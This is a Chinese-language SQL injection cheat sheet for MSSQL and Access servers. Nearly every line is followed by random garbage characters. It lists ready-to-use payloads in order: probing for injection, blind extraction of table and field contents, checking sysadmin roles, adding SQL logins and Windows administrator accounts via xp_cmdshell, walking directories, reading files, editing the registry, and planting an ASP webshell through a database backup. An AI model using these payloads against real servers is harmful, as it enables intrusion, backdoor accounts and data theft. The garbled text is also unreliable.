1.判断是否有注入;and 1=1 ;and 1=2 �>&���kb|)
2.初步判断是否是mssql ;and user>0 )�5�M9�Ro7
7:_��\t!�]
3.注入参数是字符'and [查询条件] and ''=' ?�-e�'��gC
��`*1059 �
4.搜索时没过滤参数的'and [查询条件] and '%25'=' D|Tv`47ntu
5E#koy7
$s
5.判断数据库系统 H@8g 9��;+
h""a#n)q}`
;and (select count(*) from sysobjects)>0 mssql ZoiCdXvTN�
G��*�f5�B
;and (select count(*) from msysobjects)>0 access zFtw�Aa�=r
r|Wo�M39bp
3GS�oHsN�k
�rl,�6r�u�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Z`l�9��7$\
mm�V�x',k�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 B0�:[3@P7
1/��bu}�?a
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 S>��]Jc$
�`�aS9�o]t
9.(1)猜字段的ascii值(access) �<Dr*^GX>?
N>��fC�"�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 w:�z�@!��<
I!)g�XtJA"
(2)猜字段的ascii值(mssql) T�1y,L�<7?
�&�B^vHH��
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 X`if�jZ9}d
��\Mv8pU��
10.测试权限结构(mssql) `O5kI#m)L*
"Q~6cH[#��
�@5%�c���P
6NCa��=��9
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- nF�l=D=50-
>8�V;�:(nt
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- c
25�wm\\
`�F>1�xMm
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- #4{f2s[�j6
bp6� La`+�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- [�|2u�u."$
�YZCPS6PuE
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �\<VwGbzFi
T[=�XG��AJ
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ,>%AEN6�N2
�^c1I'9(r5
;and 1=(select IS_MEMBER('db_owner'));-- B���{W�2�D
}TRr*]
P<%
%Hu���Qc�^
�H{x}g��BQ
11.添加mssql和系统的帐户 [?BmW�{*u.
{Gs&u>>R"^
;exec master.dbo.sp_addlogin username;-- Y#c�11q� Z
;exec master.dbo.sp_password null,username,password;-- /D_8uTS>d[
��o(~>��a�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ��x��Z�S��
F'Fc)9qFa<
;exec master.dbo.xp_cmdshell 'net user username password -o F�#a 8�
~��?aq��=T
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- F���5%-6@=
�:*1�G��s,
;exec master.dbo.xp_cmdshell 'net user username password /add';-- pM�\���)f
L.15�EX�AB
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- t�qrvcnQr^
�1,W%t�\D�
N7Z&_�$Bx
IqE�Y.2KN�
12.(1)遍历目录 �6.~(oepu�
&I?1(t~h�T
;create table dirs(paths varchar(100), id int) ]�k{�cPK�
f+s'.z��%
;insert dirs exec master.dbo.xp_dirtree 'c:\' sEdWB�T 8
ekP�=/;T#S
;and (select top 1 paths from dirs)>0 ~�SZ0Yu�:X
]&VD$Z984r
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) h|%�d=`P�,
\,�JRNL& �
�uGLVY�%N�
�,y�2ur��2
(2)遍历目录 �8dUwJ"<5
G`mC=*M�a;
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ��#>~$`Sg�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �+ �7E6�U*
�LjXtOF���
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ;pb~Zk/[,w
2Pi}<�pG~�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 I|9e4EX{�y
IQS�csq�M�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 OU9=��O>��
J;"�XRE[%5
`iI��YZ3i
�&.7\{q\(�
13.mssql中的存储过程 F�PFt�3XL�
j@k�B�C�zX
xp_regenumvalues 注册表根键, 子键 )KB��v[�|�
p//">l=P�s
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 _�V:D7\�Gs
�K]kL?-A#'
xp_regread 根键,子键,键值名 3u{[(W}�08
,�{8�~TVO�
;exec xp_regread 1� ,D�2][�
�u�LhamE)�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ,fET.s^�|U
.D4��D�!!�
xp_regwrite 根键,子键, 值名, 值类型, 值 4I��tXZ�o�
"5�dh]-m n
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Fl*@@jQ8cV
0U`Ic_�.��
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Q�
`E�{Oo,
/B�1�<��N}
xp_regdeletevalue 根键,子键,值名 w�M�!QU{Lz
c}v:X
Slh7
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 L1r�o�v���
`i{�o�8�l�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 /~
V"v"7E�
�o"n^zG��
&n��z1[,��
'Fc&"(!|�|
14.mssql的backup创建webshell YT:��<�AJm
T�_Y�6AII�
use model '�{:(��4>&
pd7�F�U~-�
create table cmd(str image); dc?��Yk3(Y
�/;.M$}Z>`
insert into cmd(str) values (''); N(��1jm� F
C|!E'��8Rw
backup database model to disk='c:\l.asp'; 9�w0 ^�=��
(V=lK6�WQm
{5%<@<?�)�
8���d$~wh
15.mssql内置函数 %e��T/��:I
Zs{ `Yf^Q
;and (select @@version)>0 获得Windows的版本号 I�RS^F;��)
1k�m=9[;w'
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �YKM(qh��2
~^5uOeTZ~
;and (select user_name())>0 爆当前系统的连接用户 H�Ppnw]�_
Ak}l6{� ..
;and (select db_name())>0 得到当前连接的数据库 ORHC b�w�9
�B�C4u,4S�
Rwy:.)7B$q
+[F9Q,bH@b
16.简洁的webshell 6Jj)[ R\5=
+Z�ZiZ&y��
use model 2G'G�4��5Q
�;G\�rhk��
create table cmd(str image); r%�B5@+{so
5SKu�\�H\
insert into cmd(str) values (''); �0cS.|\ZTA
=_,OucKkYG
backup database model to disk='g:\wwwtest\l.asp';
